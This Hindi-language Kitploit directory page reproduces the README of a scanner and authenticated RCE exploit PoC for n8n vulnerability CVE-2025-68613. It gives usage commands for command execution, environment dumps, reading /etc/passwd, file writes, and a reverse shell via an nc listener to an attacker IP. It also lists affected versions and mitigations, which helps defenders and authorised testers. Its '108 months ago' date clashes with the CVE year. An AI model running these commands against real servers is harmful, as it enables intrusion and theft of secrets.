Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-cve-2025-68613 — n8n में CVE-2025-68613 के लिए प्रमाणित RCE एक्सप्लॉइट PoC और भेद्यता स्कैनर। कमांड निष्पादन, फ़ाइल संचालन और अधिकृत सुरक्षा परीक्षण के लिए reverse shell payloads का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

n8n में CVE-2025-68613 के लिए प्रमाणित RCE एक्सप्लॉइट PoC और भेद्यता स्कैनर। कमांड निष्पादन, फ़ाइल संचालन और अधिकृत सुरक्षा परीक्षण के लिए reverse shell payloads का समर्थन करता है।

रिपॉजिटरी देखें
108 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68613 – n8n एक्सप्रेशन इंजेक्शन RCE

Python Security CVE Status

यह टूलकिट CVE-2025-68613 नामक महत्वपूर्ण भेद्यता के लिए स्कैनर और एक्सप्लॉइट PoC प्रदान करता है, जो n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म को प्रभावित करती है।

यह रिपॉज़िटरी n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म को प्रभावित करने वाली महत्वपूर्ण CVE-2025-68613 भेद्यता के लिए स्कैनर और एक्सप्लॉइट PoC स्क्रिप्ट प्रदान करती है।


चेतावनी / WARNING

इंडोनेशियाई

यह टूल केवल वैध और अधिकृत सुरक्षा परीक्षण के लिए है। मालिक की अनुमति के बिना इस टूल का उपयोग सिस्टम पर करना प्रतिबंधित है।

अंग्रेज़ी

यह टूल केवल अधिकृत और कानूनी सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग अवैध और निषिद्ध है।


भेद्यता अवलोकन

  • CVE ID : CVE-2025-68613
  • गंभीरता : महत्वपूर्ण
  • CVSS : 10.0
  • प्रकार : एक्सप्रेशन इंजेक्शन → रिमोट कोड निष्पादन (RCE)
  • उत्पाद : n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म

संवेदनशील संस्करण

  • 0.211.0 – 1.120.3
  • 1.121.0

पैच किए गए संस्करण

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

रिपॉज़िटरी संरचना

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # भेद्यता स्कैनर (कोई एक्सप्लॉइट नहीं)
├── tot-exploit-2025-68613.py   # प्रमाणित RCE एक्सप्लॉइट PoC
├── requirements.txt
└── README.md

स्कैनर (गैर-एक्सप्लॉइट)

स्कैनर का उपयोग निम्न के लिए किया जाता है:

  • n8n सेवा का पता लगाना
  • n8n संस्करण निकालना
  • भेद्यता की स्थिति निर्धारित करना
  • कोई शोषण नहीं करता
  • JSON आउटपुट का समर्थन करता है

स्कैनर:

  • n8n सेवा का पता लगाता है
  • n8n संस्करण निकालता है
  • भेद्यता की स्थिति निर्धारित करता है
  • कोई शोषण नहीं
  • JSON आउटपुट का समर्थन करता है

स्कैनर निम्नलिखित एंडपॉइंट की जाँच करता है:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

निर्भरताएँ / आवश्यकताएँ

इंडोनेशियाई

आवश्यक पैकेज:

  • requests

requirements.txt फ़ाइल की सामग्री:

root@kitploit:~
requests>=2.28.0

अंग्रेज़ी

आवश्यक पैकेज:

  • requests

requirements.txt सामग्री:

root@kitploit:~
requests>=2.28.0

स्थापना

root@kitploit:~
pip install -r requirements.txt

स्कैनर उपयोग

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

स्कैनर JSON मोड

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

स्कैनर JSON आउटपुट उदाहरण

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

स्कैनर निकास कोड

कोडअर्थ
0संवेदनशील नहीं
1संस्करण अज्ञात
2संवेदनशील

एक्सप्लॉइट PoC (प्रमाणित RCE)

इस एक्सप्लॉइट के लिए वैध n8n क्रेडेंशियल आवश्यक हैं
प्रमाणित पहुँच अनिवार्य है

एक्सप्लॉइट इस प्रकार काम करता है:

  1. n8n में लॉगिन करें
  2. एक वर्कफ़्लो बनाएँ
  3. Set नोड पर दुर्भावनापूर्ण एक्सप्रेशन डालें
  4. वर्कफ़्लो चलाएँ
  5. (वैकल्पिक) वर्कफ़्लो को साफ़ करें

एक्सप्लॉइट तर्क

तर्कआवश्यकविवरण
-u / --url✅लक्ष्य n8n URL
-e / --email✅n8n खाता ईमेल
-p / --password✅n8n खाता पासवर्ड
--payload✅पेलोड प्रकार
--command❌OS कमांड (cmd)
--file❌फ़ाइल पथ (read/write)
--content❌फ़ाइल सामग्री (write)
--lhost❌हमलावर IP (revshell)
--lport❌हमलावर पोर्ट (revshell)
--verify-ssl❌SSL प्रमाणपत्र सत्यापित करें

समर्थित पेलोड

पेलोडकार्य
infoसिस्टम जानकारी
cmdकमांड निष्पादन
envपर्यावरण डंप
readफ़ाइल पढ़ें
writeफ़ाइल लिखें
revshellरिवर्स शेल

स्क्रीन कैप्चर

एक्सप्लॉइट उदाहरण

सिस्टम जानकारी

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

कमांड निष्पादन

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

फ़ाइल पढ़ें

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

फ़ाइल लिखें

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

रिवर्स शेल

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

शमन

  • n8n को पैच किए गए संस्करणों में अपग्रेड करें
  • /rest/* एंडपॉइंट तक पहुँच प्रतिबंधित करें
  • RBAC और मजबूत प्रमाणीकरण लागू करें
  • अज्ञात वर्कफ़्लो का ऑडिट करें

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।


GitHub टैग

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

कानूनी रहें। नैतिक रहें।

टूल डाउनलोड करें